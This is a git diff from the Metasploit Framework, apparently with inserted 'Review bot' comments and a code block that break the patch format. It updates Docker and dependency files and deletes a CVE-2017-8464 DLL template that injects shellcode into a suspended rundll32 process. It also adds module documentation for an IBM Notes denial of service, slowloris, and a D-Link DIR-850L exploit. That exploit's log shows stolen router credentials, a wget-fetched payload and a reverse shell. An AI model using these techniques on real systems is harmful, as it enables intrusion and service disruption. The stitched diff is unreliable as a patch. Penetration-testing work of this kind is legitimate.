diff --git a/.dockerignore b/.dockerignore
index a066428ead..b6add3b6e4 100644
--- a/.dockerignore
+++ b/.dockerignore
@@ -34,7 +34,7 @@ config/database.yml
# target config file for testing
features/support/targets.yml
# simplecov coverage data
-coverage
+coverage/
doc/
external/source/meterpreter/java/bin
external/source/meterpreter/java/build
diff --git a/.gitignore b/.gitignore
index 233af3374f..8398940932 100644
--- a/.gitignore
+++ b/.gitignore
@@ -88,6 +88,7 @@ data/meterpreter/ext_server_pivot.*.dll
# local docker compose overrides
docker-compose.local*
+.env
# Ignore python bytecode
*.pyc
diff --git a/.travis.yml b/.travis.yml
index ffcbff526b..5d4166a1b4 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -25,7 +25,7 @@ matrix:
jobs:
# build docker image
include:
- - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
+ - env: CMD="docker-compose build" DOCKER="true"
# we do not need any setup
before_install: skip
install: skip
diff --git a/Dockerfile b/Dockerfile
index 1bf0d1c27c..f6c0007042 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,14 +1,17 @@
FROM ruby:2.4.2-alpine
-MAINTAINER Rapid7
+LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
ENV NMAP_PRIVILEGED=""
+ENV BUNDLE_IGNORE_MESSAGES="true"
WORKDIR $APP_HOME
-COPY Gemfile* m* Rakefile $APP_HOME
-COPY lib $APP_HOME/lib
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
+COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
+COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
RUN apk update && \
apk add \
@@ -45,7 +48,7 @@ RUN apk update && \
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
USER $MSF_USER
diff --git a/Gemfile.lock b/Gemfile.lock
index 934e2c31f6..5005305830 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
- metasploit-framework (4.16.13)
+ metasploit-framework (4.16.23)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@@ -17,9 +17,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
- metasploit-payloads (= 1.3.11)
+ metasploit-payloads (= 1.3.18)
metasploit_data_models
- metasploit_payloads-mettle (= 0.2.2)
+ metasploit_payloads-mettle (= 0.2.8)
msgpack
nessus_rest
net-ssh
@@ -49,7 +49,7 @@ PATH
rex-mime
rex-nop
rex-ole
- rex-powershell (< 0.1.73)
+ rex-powershell (< 0.1.78)
rex-random_identifier
rex-registry
rex-rop_builder
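Review bot: The replaced setcap line still runs with an unquoted, unchecked `$(which nmap)`; if nmap is not on PATH in that layer the substitution is empty, setcap exits with a usage error and the build stops with a message that does not name the real cause. Consider `RUN nmap_bin="$(command -v nmap)" && /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip "$nmap_bin"` so a missing binary fails the step explicitly and the path is quoted. The preceding context line (unchanged by this commit) sets the same file capabilities on the ruby binary, so every Ruby process in the image, not only nmap, carries cap_net_raw and cap_net_bind_service; a one-line comment above it explaining why msfconsole needs that would help future reviewers judge whether it can be narrowed.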
@@ -112,43 +112,43 @@ GEM
builder (3.2.3)
coderay (1.1.2)
concurrent-ruby (1.0.5)
- crass (1.0.2)
+ crass (1.0.3)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
- factory_girl (4.8.1)
+ factory_girl (4.9.0)
activesupport (>= 3.0.0)
- factory_girl_rails (4.8.0)
- factory_girl (~> 4.8.0)
+ factory_girl_rails (4.9.0)
+ factory_girl (~> 4.9.0)
railties (>= 3.0.0)
faraday (0.13.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
- google-protobuf (3.4.1.1)
- googleapis-common-protos-types (1.0.0)
+ google-protobuf (3.5.0)
+ googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
- googleauth (0.5.3)
+ googleauth (0.6.2)
faraday (~> 0.12)
- jwt (~> 1.4)
+ jwt (>= 1.4, < 3.0)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
- grpc (1.6.7)
+ grpc (1.7.3)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
- googleauth (~> 0.5.1)
+ googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
- i18n (0.9.0)
+ i18n (0.9.1)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
- jwt (1.5.6)
+ jwt (2.1.0)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
@@ -178,7 +178,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
- metasploit-payloads (1.3.11)
+ metasploit-payloads (1.3.18)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@@ -189,11 +189,11 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
- metasploit_payloads-mettle (0.2.2)
+ metasploit_payloads-mettle (0.2.8)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
- msgpack (1.1.0)
+ msgpack (1.2.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
@@ -223,10 +223,10 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
- pry (0.11.2)
+ pry (0.11.3)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
- public_suffix (3.0.0)
+ public_suffix (3.0.1)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
@@ -243,16 +243,16 @@ GEM
activesupport (= 4.2.10)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
- rake (12.1.0)
+ rake (12.3.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
ffi
- rbnacl-libsodium (1.0.13)
+ rbnacl-libsodium (1.0.15.1)
rbnacl (>= 3.0.1)
- recog (2.1.15)
+ recog (2.1.17)
nokogiri
redcarpet (3.4.0)
- rex-arch (0.1.11)
+ rex-arch (0.1.13)
rex-text
rex-bin_tools (0.1.4)
metasm
@@ -265,7 +265,7 @@ GEM
metasm
rex-arch
rex-text
- rex-exploitation (0.1.15)
+ rex-exploitation (0.1.16)
jsobfu
metasm
rex-arch
@@ -278,7 +278,7 @@ GEM
rex-arch
rex-ole (0.1.6)
rex-text
- rex-powershell (0.1.72)
+ rex-powershell (0.1.77)
rex-random_identifier
rex-text
rex-random_identifier (0.1.4)
@@ -288,7 +288,7 @@ GEM
metasm
rex-core
rex-text
- rex-socket (0.1.8)
+ rex-socket (0.1.9)
rex-core
rex-sslscan (0.1.5)
rex-core
@@ -311,7 +311,7 @@ GEM
rspec-mocks (3.7.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.7.0)
- rspec-rails (3.7.1)
+ rspec-rails (3.7.2)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
@@ -348,16 +348,16 @@ GEM
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
- tzinfo (1.2.3)
+ tzinfo (1.2.4)
thread_safe (~> 0.1)
- tzinfo-data (1.2017.2)
+ tzinfo-data (1.2017.3)
tzinfo (>= 1.0.0)
windows_error (0.1.2)
xdr (2.0.0)
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
- yard (0.9.9)
+ yard (0.9.12)
PLATFORMS
ruby
@@ -378,4 +378,4 @@ DEPENDENCIES
yard
BUNDLED WITH
- 1.15.4
+ 1.16.0
diff --git a/README.md b/README.md
index 16b401ac91..849f6107cd 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
==
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh
deleted file mode 100755
index 878e3e3fa8..0000000000
--- a/data/exploits/cve-2017-8464/src/build.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/sh
-rm -f *.o *.dll
-
-CCx86="i686-w64-mingw32"
-CCx64="x86_64-w64-mingw32"
-
-${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
-${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
-${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
-rm -f temp.dll *.o
-
-${CCx86}-gcc -c -Os template.c -Wall -shared
-${CCx86}-dllwrap --def template.def *.o -o temp.dll
-${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
-rm -f temp.dll *.o
diff --git a/data/exploits/cve-2017-8464/src/template.c b/data/exploits/cve-2017-8464/src/template.c
deleted file mode 100644
index 01553dc914..0000000000
--- a/data/exploits/cve-2017-8464/src/template.c
+++ /dev/null
@@ -1,95 +0,0 @@ -// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll -// - removed ExitThread(0) to prevent an Explorer crash -// - added Mutex to prevent invoking payload multiple times (at least try) -#include -#include "template.h" - -void inline_bzero(void *p, size_t l) -{ - BYTE *q = (BYTE *)p; - size_t x = 0; - for (x = 0; x < l; x++) - *(q++) = 0x00; -} - -void ExecutePayload(void); - -BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) -{ - switch (dwReason) - { - case DLL_PROCESS_ATTACH: - ExecutePayload(); - break; - - case DLL_PROCESS_DETACH: - break; - - case DLL_THREAD_ATTACH: - break; - - case DLL_THREAD_DETACH: - break; - } - - return TRUE; -} - -void ExecutePayload(void) -{ - PROCESS_INFORMATION pi; - STARTUPINFO si; - CONTEXT ctx; - LPVOID ep; - HANDLE hMutex; - SECURITY_ATTRIBUTES MutexAttributes; - - inline_bzero(&MutexAttributes, sizeof(MutexAttributes)); - MutexAttributes.nLength = sizeof(MutexAttributes); - MutexAttributes.bInheritHandle = TRUE; // inherit the handle - hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex"); - if(hMutex == NULL) - { - return; - } - - if(GetLastError() == ERROR_ALREADY_EXISTS) - { - CloseHandle(hMutex); - return; - } - - if(GetLastError() == ERROR_ACCESS_DENIED) - { - CloseHandle(hMutex); - return; - } - - // Start up the payload in a new process - inline_bzero(&si, sizeof(si)); - si.cb = sizeof(si); - - // Create a suspended process, write shellcode into stack, resume it - if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { - ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL; - GetThreadContext(pi.hThread, &ctx); - - ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0); - -#ifdef _WIN64 - ctx.Rip = (DWORD64)ep; -#else - ctx.Eip = (DWORD)ep; 
-#endif - - SetThreadContext(pi.hThread, &ctx); - ResumeThread(pi.hThread); - - CloseHandle(pi.hThread); - CloseHandle(pi.hProcess); - } - - CloseHandle(hMutex); -} - diff --git a/data/exploits/cve-2017-8464/src/template.h b/data/exploits/cve-2017-8464/src/template.h deleted file mode 100644 index 7a674c3006..0000000000 --- a/data/exploits/cve-2017-8464/src/template.h +++ /dev/null @@ -1,3 +0,0 @@ -#define SCSIZE 2048 -unsigned char code[SCSIZE] = "PAYLOAD:"; - diff --git a/data/exploits/cve-2017-8464/template_x64_windows.dll b/data/exploits/cve-2017-8464/template_x64_windows.dll old mode 100755 new mode 100644 index 40958f8986..b5b0009cdb Binary files a/data/exploits/cve-2017-8464/template_x64_windows.dll and b/data/exploits/cve-2017-8464/template_x64_windows.dll differ diff --git a/data/exploits/cve-2017-8464/template_x86_windows.dll b/data/exploits/cve-2017-8464/template_x86_windows.dll old mode 100755 new mode 100644 index b95dfe5232..45f97128ec Binary files a/data/exploits/cve-2017-8464/template_x86_windows.dll and b/data/exploits/cve-2017-8464/template_x86_windows.dll differ diff --git a/docker/docker-compose.development.override.yml b/docker-compose.override.yml similarity index 78% rename from docker/docker-compose.development.override.yml rename to docker-compose.override.yml index f4ac60633a..134c1e8503 100644 --- a/docker/docker-compose.development.override.yml +++ b/docker-compose.override.yml @@ -1,13 +1,14 @@ -version: '2' +version: '3' services: ms: build: + context: . + dockerfile: ./Dockerfile args: BUNDLER_ARGS: --jobs=8 image: metasploit:dev environment: DATABASE_URL: postgres://postgres@db:5432/msf_dev - volumes: - .:/usr/src/metasploit-framework diff --git a/docker-compose.yml b/docker-compose.yml index 0f433b31fe..725f398500 100644 --- a/docker-compose.yml +++ b/docker-compose.yml 
@@ -1,10 +1,7 @@
-version: '2'
+version: '3'
services:
ms:
- image: metasploit
- build:
- context: .
- dockerfile: ./Dockerfile
+ image: metasploitframework/metasploit-framework:latest
environment:
DATABASE_URL: postgres://postgres@db:5432/msf
links:
@@ -16,7 +13,7 @@ services:
- /etc/localtime:/etc/localtime:ro
db:
- image: postgres:9-alpine
+ image: postgres:10-alpine
volumes:
- pg_data:/var/lib/postgresql/data
diff --git a/docker/README.md b/docker/README.md
index a137b8c327..cec9d02070 100644
--- a/docker/README.md
+++ b/docker/README.md
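Review bot: The default compose file now pulls `metasploitframework/metasploit-framework:latest` from Docker Hub instead of building from the checked-out Dockerfile, and `latest` is a mutable tag, so what `docker-compose up` actually runs can change with no change in the repository and cannot be reproduced or audited later. Pin the image to a release tag or, better, a content digest, e.g. `image: metasploitframework/metasploit-framework@sha256:<digest-placeholder>`, and say in docker/README.md how that pin is refreshed; the local build path survives only in docker-compose.override.yml, which is worth stating in a comment above `image:`. The `DATABASE_URL: postgres://postgres@db:5432/msf` context line (unchanged here) connects with no password, which is only acceptable while the db service's port is not published; a short comment on the `db:` service in the second hunk stating that assumption would stop a later override from silently exposing it.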
@@ -3,43 +3,36 @@ To run `msfconsole` ```bash +docker-compose build docker-compose run --rm --service-ports ms ``` +or +```bash +./docker/bin/msfconsole +``` To run `msfvenom` ```bash -docker-compose run --rm ms ./msfvenom +docker-compose build +docker-compose run --rm --no-deps ms ./msfvenom ``` - -### I don't like typing `docker-compose --rm ...` - -We have included some binstubs `./bin`, you can symlink them to your path. - -Assuming you have `$HOME/bin`, and it's in your `$PATH`. You can run this from the project root: - +or ```bash -ln -s `pwd`/docker/bin/msfconsole $HOME/bin/ -ln -s `pwd`/docker/bin/msfvenom $HOME/bin/ +./docker/bin/msfvenom ``` -If you set the environment variable `MSF_BUILD` the container will be rebuilt. - -```bash -MSF_BUILD=1 ./docker/bin/msfconsole -MSF_BUILD=1 ./docker/bin/msfconsole-dev -``` +You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs. ### But I want reverse shells... -By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip -of your host machine. +By default we expose port `4444`. If you want to expose more ports, or have `LHOST` prepopulated with a specific value; you'll need to setup a local docker-compose override for this. -Create `docker/docker-compose.local.override.yml` with: +Create `docker-compose.local.override.yml` with: ```yml -version: '2' +version: '3' services: ms: environment: 
@@ -56,19 +49,6 @@ Now you need to set the `COMPOSE_FILE` environment variable to load your local
override.
```bash
-echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.local.override.yml" >> .env
+echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
```
Now you should be able get reverse shells working
-
-## Developing
-
-To setup you environment for development, you need to add `docker/docker-compose.development.override.yml`
-to your `COMPOSE_FILE` environment variable.
-
-If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this:
-
-```bash
-echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env
-```
-
-Alternatively you can also use the `msfconsole-dev` binstub.
diff --git a/docker/bin/msfconsole b/docker/bin/msfconsole
index a6b0b722f7..b85d150546 100755
--- a/docker/bin/msfconsole
+++ b/docker/bin/msfconsole
@@ -19,8 +19,12 @@ fi
cd $MSF_PATH
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml build
+PARAMS="$@"
+
+if [[ $PARAMS == *"--rebuild"* ]]; then
+ echo "Rebuilding image"
+ docker-compose build
+ exit $?
fi
-docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
+docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
diff --git a/docker/bin/msfconsole-dev b/docker/bin/msfconsole-dev
deleted file mode 100755
index 69cf879975..0000000000
--- a/docker/bin/msfconsole-dev
+++ /dev/null
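Review bot: `PARAMS="$@"` in the msfconsole binstub hunk joins every argument into one string, and `"$PARAMS"` on the last added line then hands that to msfconsole as a single argument, so a call like `./docker/bin/msfconsole -q -x 'db_status'` arrives as one word and option parsing breaks (the removed line forwarded `"$@"` correctly). The `*"--rebuild"*` glob also matches any argument that merely contains that substring, for instance a resource-script path, and triggers a rebuild instead of a run. Keep `"$@"` intact and test for `--rebuild` as a whole argument; the docker/bin/msfvenom hunk below has the same two problems. The context line `cd $MSF_PATH` is also unchecked, so if the directory is wrong docker-compose runs against whatever compose file is in the current directory; `cd "$MSF_PATH" || exit 1` fails fast instead.
```shell
cd "$MSF_PATH" || exit 1

for arg in "$@"; do
  if [[ $arg == "--rebuild" ]]; then
    echo "Rebuilding image"
    docker-compose build
    exit $?
  fi
done

docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
```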
@@ -1,27 +0,0 @@
-#! /bin/bash
-
-if [[ -z "$MSF_PATH" ]]; then
- path=`dirname $0`
-
- # check for ./docker/msfconsole.rc
- if [[ ! -f $path/../msfconsole.rc ]] ; then
-
- # we are not inside the project
- realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
-
- # determine script path
- pushd $(dirname $(realpath $0)) > /dev/null
- path=$(pwd)
- popd > /dev/null
- fi
- MSF_PATH=$(dirname $(dirname $path))
-fi
-
-cd $MSF_PATH
-
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
-fi
-
-docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
-
diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom
index 3efc05168d..dd0f96cd49 100755
--- a/docker/bin/msfvenom
+++ b/docker/bin/msfvenom
@@ -17,9 +17,15 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path))
fi
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml build
+cd $MSF_PATH
+
+PARAMS="$@"
+
+if [[ $PARAMS == *"--rebuild"* ]]; then
+ echo "Rebuilding image"
+ docker-compose build
+ exit $?
fi
-cd $MSF_PATH
-docker-compose run --rm --service-ports ms ./msfvenom "$@"
+# we need no database here
+docker-compose run --rm --no-deps ms ./msfvenom "$PARAMS"
diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev
deleted file mode 100755
index 32b1049748..0000000000
--- a/docker/bin/msfvenom-dev
+++ /dev/null
@@ -1,26 +0,0 @@
-#! /bin/bash
-
-if [[ -z "$MSF_PATH" ]]; then
- path=`dirname $0`
-
- # check for ./docker/msfconsole.rc
- if [[ ! -f $path/../msfconsole.rc ]] ; then
-
- # we are not inside the project
- realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
-
- # determine script path
- pushd $(dirname $(realpath $0)) > /dev/null
- path=$(pwd)
- popd > /dev/null
- fi
- MSF_PATH=$(dirname $(dirname $path))
-fi
-
-cd $MSF_PATH
-
-if [[ -n "$MSF_BUILD" ]]; then
- docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
-fi
-
-docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
diff --git a/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
new file mode 100644
index 0000000000..1a79f08bb1
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
@@ -0,0 +1,67 @@ +## Vulnerable Application +This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application. + +If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, +would cause the client hang and have to be restarted. + +Affected Products and Versions + +IBM Notes 9.0.1 to 9.0.1 FP8 IF1 +IBM Notes 9.0 to 9.0 IF4. +IBM Notes 8.5.3 to 8.5.3 FP6 IF13. +IBM Notes 8.5.2 to 8.5.2 FP4 IF3. +IBM Notes 8.5.1. to 8.5.1 FP5 IF5. +IBM Notes 8.5 release + +Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 + +## Verification + +Start msfconsole + +`use auxiliary/dos/http/ibm_lotus_notes2.rb` + +Set `SRVHOST` + +Set `SRVPORT` + +run (Server started) +Visit server URL in the built-in web-browser of IBM Notes client application + +## Scenarios + +``` +msf > use auxiliary/dos/http/ibm_lotus_notes2 +msf auxiliary(ibm_lotus_notes2) > show options + +Module options (auxiliary/dos/http/ibm_lotus_notes2): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + + +Auxiliary action: + + Name Description + ---- ----------- + WebServer + + +msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50 +SRVHOST => 192.168.0.50 +msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092 +SRVPORT => 9092 +msf auxiliary(ibm_lotus_notes2) > run +[*] Auxiliary module execution completed +msf auxiliary(ibm_lotus_notes2) > +[*] Using URL: http://192.168.0.50:9092/mypath +[*] Server started. 
+msf auxiliary(ibm_lotus_notes2) > +``` + +At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive. diff --git a/documentation/modules/auxiliary/dos/http/slowloris.md b/documentation/modules/auxiliary/dos/http/slowloris.md new file mode 100644 index 0000000000..dfa1937774 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slowloris.md 
@@ -0,0 +1,47 @@ +## Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Vulnerable application versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +## Verification Steps + +1. Start msfconsole +2. Do: `use auxiliary/dos/http/slowloris` +3. Do: `set RHOST` +4. Do: `run` +5. Visit server URL in your web-browser. + +## Scenarios + +### Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slowloris +msf auxiliary(slowloris) > show options + +Module options (auxiliary/dos/http/slowloris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + delay 15 yes The delay between sending keep-alive headers + rand_user_agent true yes Randomizes user-agent with each request + rhost 172.28.128.4 yes The target address + rport 80 yes The target port + sockets 150 yes The number of sockets to use in the attack + ssl false yes Negotiate SSL/TLS for outgoing connections + +msf auxiliary(slowloris) > set rhost 172.28.128.4 +rhost => 172.28.128.4 +msf auxiliary(slowloris) > run + +[*] Starting server... +[*] Attacking 172.28.128.4 with 150 sockets +[*] Creating sockets... +[*] Sending keep-alive headers... Socket count: 150 +``` diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md new file mode 100644 index 0000000000..99809325f4 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md 
@@ -0,0 +1,64 @@ +The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection +vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 +are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp` + 5. Do : `run` + 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session + + +## Example + +``` +msf > use exploit/linux/http/dlink_dir850l_unauth_exec +msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14 +RHOST => 192.168.0.14 +msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80 +RPORT => 80 +msf exploit(dlink_dir850l_unauth_exec) > check +[*] 192.168.0.14:80 The target service is running, but could not be validated. +msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true +VERBOSE => true +msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3 +LHOST => ens3 +msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131 +LPORT => 3131 +msf exploit(dlink_dir850l_unauth_exec) > run + +[*] Started reverse TCP handler on 192.168.0.11:3131 +[*] 192.168.0.14:80 - Connecting to target... 
+[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535 +[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt +[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm +[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm +[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting for target to request the ELF payload... +[*] 192.168.0.14:80 - Sending payload to the server... +[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm +[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us... +[*] Sending stage (84 bytes) to 192.168.0.14 +[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400 +[+] Deleted /tmp/uoskutcy +[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? +[*] Server stopped. +[*] Exploit completed, but no session was created. +msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1 +[*] Starting interaction with 1... + +190745749 +wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj +true +pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP +OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH +iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY +pwd +/ +``` diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md index 4c32e54a03..6e59fc82aa 100644 --- a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md 
